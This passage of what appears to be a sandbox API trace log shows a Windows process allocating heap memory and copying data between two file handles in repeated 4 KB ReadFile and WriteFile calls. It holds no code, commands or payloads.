RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0077.387] GetLastError () returned 0x0 [0077.387] SetLastError (dwErrCode=0x0) [0077.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0077.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0077.387] GetLastError () returned 0x0 [0077.387] SetLastError (dwErrCode=0x0) [0077.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0077.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0077.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0077.387] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0077.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0077.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0077.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x93678 [0077.442] GetLastError () returned 0x0 [0077.442] SetLastError (dwErrCode=0x0) [0077.442] GetLastError () returned 0x0 [0077.442] SetLastError (dwErrCode=0x0) [0077.442] GetLastError () returned 0x0 [0077.442] SetLastError (dwErrCode=0x0) [0077.443] GetLastError () returned 0x0 [0077.443] SetLastError (dwErrCode=0x0) [0077.443] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.443] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.444] GetLastError () returned 0x0 [0077.444] SetLastError (dwErrCode=0x0) [0077.445] GetLastError () returned 0x0 [0077.445] SetLastError (dwErrCode=0x0) [0077.445] GetLastError () returned 0x0 [0077.445] SetLastError (dwErrCode=0x0) [0077.445] GetLastError () returned 0x0 [0077.445] SetLastError (dwErrCode=0x0) [0077.445] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.445] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.445] GetLastError () returned 0x0 [0077.445] SetLastError (dwErrCode=0x0) [0077.445] GetLastError () returned 0x0 [0077.445] SetLastError (dwErrCode=0x0) [0077.446] GetLastError () returned 0x0 [0077.446] SetLastError (dwErrCode=0x0) [0077.446] GetLastError () returned 0x0 [0077.446] SetLastError (dwErrCode=0x0) [0077.446] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.446] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.446] GetLastError () returned 0x0 [0077.446] SetLastError (dwErrCode=0x0) [0077.446] GetLastError () returned 0x0 [0077.446] SetLastError (dwErrCode=0x0) [0077.446] GetLastError () returned 0x0 [0077.447] SetLastError (dwErrCode=0x0) [0077.447] GetLastError () returned 0x0 [0077.447] SetLastError (dwErrCode=0x0) [0077.447] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.447] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.447] GetLastError () returned 0x0 [0077.447] SetLastError (dwErrCode=0x0) [0077.447] GetLastError () returned 0x0 [0077.447] SetLastError (dwErrCode=0x0) [0077.447] GetLastError () returned 0x0 [0077.447] SetLastError (dwErrCode=0x0) [0077.447] GetLastError () returned 0x0 [0077.447] SetLastError (dwErrCode=0x0) [0077.448] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.448] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.448] GetLastError () returned 0x0 [0077.448] SetLastError (dwErrCode=0x0) [0077.448] GetLastError () returned 0x0 [0077.448] SetLastError (dwErrCode=0x0) [0077.448] GetLastError () returned 0x0 [0077.448] SetLastError (dwErrCode=0x0) [0077.448] GetLastError () returned 0x0 [0077.448] SetLastError (dwErrCode=0x0) [0077.448] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.449] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.449] GetLastError () returned 0x0 [0077.449] SetLastError (dwErrCode=0x0) [0077.449] GetLastError () returned 0x0 [0077.449] SetLastError (dwErrCode=0x0) [0077.449] GetLastError () returned 0x0 [0077.449] SetLastError (dwErrCode=0x0) [0077.449] GetLastError () returned 0x0 [0077.449] SetLastError (dwErrCode=0x0) [0077.449] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.449] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.450] GetLastError () returned 0x0 [0077.450] SetLastError (dwErrCode=0x0) [0077.450] GetLastError () returned 0x0 [0077.450] SetLastError (dwErrCode=0x0) [0077.450] GetLastError () returned 0x0 [0077.450] SetLastError (dwErrCode=0x0) [0077.450] GetLastError () returned 0x0 [0077.450] SetLastError (dwErrCode=0x0) [0077.450] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.450] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.450] GetLastError () returned 0x0 [0077.450] SetLastError (dwErrCode=0x0) [0077.451] GetLastError () returned 0x0 [0077.451] SetLastError (dwErrCode=0x0) [0077.451] GetLastError () returned 0x0 [0077.451] SetLastError (dwErrCode=0x0) [0077.451] GetLastError () returned 0x0 [0077.451] SetLastError (dwErrCode=0x0) [0077.451] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.451] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.451] GetLastError () returned 0x0 [0077.451] SetLastError (dwErrCode=0x0) [0077.451] GetLastError () returned 0x0 [0077.451] SetLastError (dwErrCode=0x0) [0077.451] GetLastError () returned 0x0 [0077.452] SetLastError (dwErrCode=0x0) [0077.452] GetLastError () returned 0x0 [0077.452] SetLastError (dwErrCode=0x0) [0077.452] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.452] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.452] GetLastError () returned 0x0 [0077.452] SetLastError (dwErrCode=0x0) [0077.452] GetLastError () returned 0x0 [0077.452] SetLastError (dwErrCode=0x0) [0077.452] GetLastError () returned 0x0 [0077.452] SetLastError (dwErrCode=0x0) [0077.452] GetLastError () returned 0x0 [0077.453] SetLastError (dwErrCode=0x0) [0077.453] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.453] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.453] GetLastError () returned 0x0 [0077.453] SetLastError (dwErrCode=0x0) [0077.453] GetLastError () returned 0x0 [0077.453] SetLastError (dwErrCode=0x0) [0077.453] GetLastError () returned 0x0 [0077.453] SetLastError (dwErrCode=0x0) [0077.453] GetLastError () returned 0x0 [0077.453] SetLastError (dwErrCode=0x0) [0077.453] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.454] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.454] GetLastError () returned 0x0 [0077.454] SetLastError (dwErrCode=0x0) [0077.454] GetLastError () returned 0x0 [0077.454] SetLastError (dwErrCode=0x0) [0077.454] GetLastError () returned 0x0 [0077.454] SetLastError (dwErrCode=0x0) [0077.454] GetLastError () returned 0x0 [0077.454] SetLastError (dwErrCode=0x0) [0077.454] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.454] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.455] GetLastError () returned 0x0 [0077.455] SetLastError (dwErrCode=0x0) [0077.455] GetLastError () returned 0x0 [0077.455] SetLastError (dwErrCode=0x0) [0077.455] GetLastError () returned 0x0 [0077.455] SetLastError (dwErrCode=0x0) [0077.455] GetLastError () returned 0x0 [0077.455] SetLastError (dwErrCode=0x0) [0077.455] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.455] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.456] GetLastError () returned 0x0 [0077.456] SetLastError (dwErrCode=0x0) [0077.456] GetLastError () returned 0x0 [0077.456] SetLastError (dwErrCode=0x0) [0077.457] GetLastError () returned 0x0 [0077.457] SetLastError (dwErrCode=0x0) [0077.457] GetLastError () returned 0x0 [0077.457] SetLastError (dwErrCode=0x0) [0077.457] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.457] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.458] GetLastError () returned 0x0 [0077.458] SetLastError (dwErrCode=0x0) [0077.458] GetLastError () returned 0x0 [0077.458] SetLastError (dwErrCode=0x0) [0077.458] GetLastError () returned 0x0 [0077.458] SetLastError (dwErrCode=0x0) [0077.458] GetLastError () returned 0x0 [0077.458] SetLastError (dwErrCode=0x0) [0077.458] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.458] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.459] GetLastError () returned 0x0 [0077.459] SetLastError (dwErrCode=0x0) [0077.459] GetLastError () returned 0x0 [0077.459] SetLastError (dwErrCode=0x0) [0077.459] GetLastError () returned 0x0 [0077.459] SetLastError (dwErrCode=0x0) [0077.459] GetLastError () returned 0x0 [0077.459] SetLastError (dwErrCode=0x0) [0077.459] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.459] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.459] GetLastError () returned 0x0 [0077.459] SetLastError (dwErrCode=0x0) [0077.459] GetLastError () returned 0x0 [0077.460] SetLastError (dwErrCode=0x0) [0077.460] GetLastError () returned 0x0 [0077.460] SetLastError (dwErrCode=0x0) [0077.460] GetLastError () returned 0x0 [0077.460] SetLastError (dwErrCode=0x0) [0077.460] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.460] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.460] GetLastError () returned 0x0 [0077.460] SetLastError (dwErrCode=0x0) [0077.460] GetLastError () returned 0x0 [0077.460] SetLastError (dwErrCode=0x0) [0077.460] GetLastError () returned 0x0 [0077.460] SetLastError (dwErrCode=0x0) [0077.461] GetLastError () returned 0x0 [0077.461] SetLastError (dwErrCode=0x0) [0077.461] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.461] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.461] GetLastError () returned 0x0 [0077.461] SetLastError (dwErrCode=0x0) [0077.461] GetLastError () returned 0x0 [0077.461] SetLastError (dwErrCode=0x0) [0077.461] GetLastError () returned 0x0 [0077.461] SetLastError (dwErrCode=0x0) [0077.461] GetLastError () returned 0x0 [0077.461] SetLastError (dwErrCode=0x0) [0077.462] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.462] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.462] GetLastError () returned 0x0 [0077.462] SetLastError (dwErrCode=0x0) [0077.462] GetLastError () returned 0x0 [0077.462] SetLastError (dwErrCode=0x0) [0077.462] GetLastError () returned 0x0 [0077.462] SetLastError (dwErrCode=0x0) [0077.463] GetLastError () returned 0x0 [0077.463] SetLastError (dwErrCode=0x0) [0077.463] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.463] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.463] GetLastError () returned 0x0 [0077.463] SetLastError (dwErrCode=0x0) [0077.463] GetLastError () returned 0x0 [0077.463] SetLastError (dwErrCode=0x0) [0077.463] GetLastError () returned 0x0 [0077.463] SetLastError (dwErrCode=0x0) [0077.463] GetLastError () returned 0x0 [0077.463] SetLastError (dwErrCode=0x0) [0077.464] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.464] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.464] GetLastError () returned 0x0 [0077.464] SetLastError (dwErrCode=0x0) [0077.464] GetLastError () returned 0x0 [0077.464] SetLastError (dwErrCode=0x0) [0077.464] GetLastError () returned 0x0 [0077.464] SetLastError (dwErrCode=0x0) [0077.464] GetLastError () returned 0x0 [0077.464] SetLastError (dwErrCode=0x0) [0077.464] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.465] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.465] GetLastError () returned 0x0 [0077.465] SetLastError (dwErrCode=0x0) [0077.465] GetLastError () returned 0x0 [0077.465] SetLastError (dwErrCode=0x0) [0077.465] GetLastError () returned 0x0 [0077.465] SetLastError (dwErrCode=0x0) [0077.465] GetLastError () returned 0x0 [0077.465] SetLastError (dwErrCode=0x0) [0077.465] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.465] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.466] GetLastError () returned 0x0 [0077.466] SetLastError (dwErrCode=0x0) [0077.466] GetLastError () returned 0x0 [0077.466] SetLastError (dwErrCode=0x0) [0077.466] GetLastError () returned 0x0 [0077.466] SetLastError (dwErrCode=0x0) [0077.466] GetLastError () returned 0x0 [0077.466] SetLastError (dwErrCode=0x0) [0077.466] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.466] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.466] GetLastError () returned 0x0 [0077.466] SetLastError (dwErrCode=0x0) [0077.466] GetLastError () returned 0x0 [0077.466] SetLastError (dwErrCode=0x0) [0077.466] GetLastError () returned 0x0 [0077.466] SetLastError (dwErrCode=0x0) [0077.466] GetLastError () returned 0x0 [0077.466] SetLastError (dwErrCode=0x0) [0077.467] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.467] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.467] GetLastError () returned 0x0 [0077.467] SetLastError (dwErrCode=0x0) [0077.467] GetLastError () returned 0x0 [0077.467] SetLastError (dwErrCode=0x0) [0077.467] GetLastError () returned 0x0 [0077.467] SetLastError (dwErrCode=0x0) [0077.467] GetLastError () returned 0x0 [0077.467] SetLastError (dwErrCode=0x0) [0077.467] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.467] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.467] GetLastError () returned 0x0 [0077.467] SetLastError (dwErrCode=0x0) [0077.467] GetLastError () returned 0x0 [0077.467] SetLastError (dwErrCode=0x0) [0077.467] GetLastError () returned 0x0 [0077.467] SetLastError (dwErrCode=0x0) [0077.467] GetLastError () returned 0x0 [0077.467] SetLastError (dwErrCode=0x0) [0077.468] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.468] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.468] GetLastError () returned 0x0 [0077.468] SetLastError (dwErrCode=0x0) [0077.468] GetLastError () returned 0x0 [0077.468] SetLastError (dwErrCode=0x0) [0077.468] GetLastError () returned 0x0 [0077.468] SetLastError (dwErrCode=0x0) [0077.468] GetLastError () returned 0x0 [0077.468] SetLastError (dwErrCode=0x0) [0077.468] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.468] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.468] GetLastError () returned 0x0 [0077.468] SetLastError (dwErrCode=0x0) [0077.468] GetLastError () returned 0x0 [0077.468] SetLastError (dwErrCode=0x0) [0077.468] GetLastError () returned 0x0 [0077.468] SetLastError (dwErrCode=0x0) [0077.468] GetLastError () returned 0x0 [0077.468] SetLastError (dwErrCode=0x0) [0077.469] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.469] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.469] GetLastError () returned 0x0 [0077.469] SetLastError (dwErrCode=0x0) [0077.469] GetLastError () returned 0x0 [0077.469] SetLastError (dwErrCode=0x0) [0077.469] GetLastError () returned 0x0 [0077.469] SetLastError (dwErrCode=0x0) [0077.469] GetLastError () returned 0x0 [0077.469] SetLastError (dwErrCode=0x0) [0077.469] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.469] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, 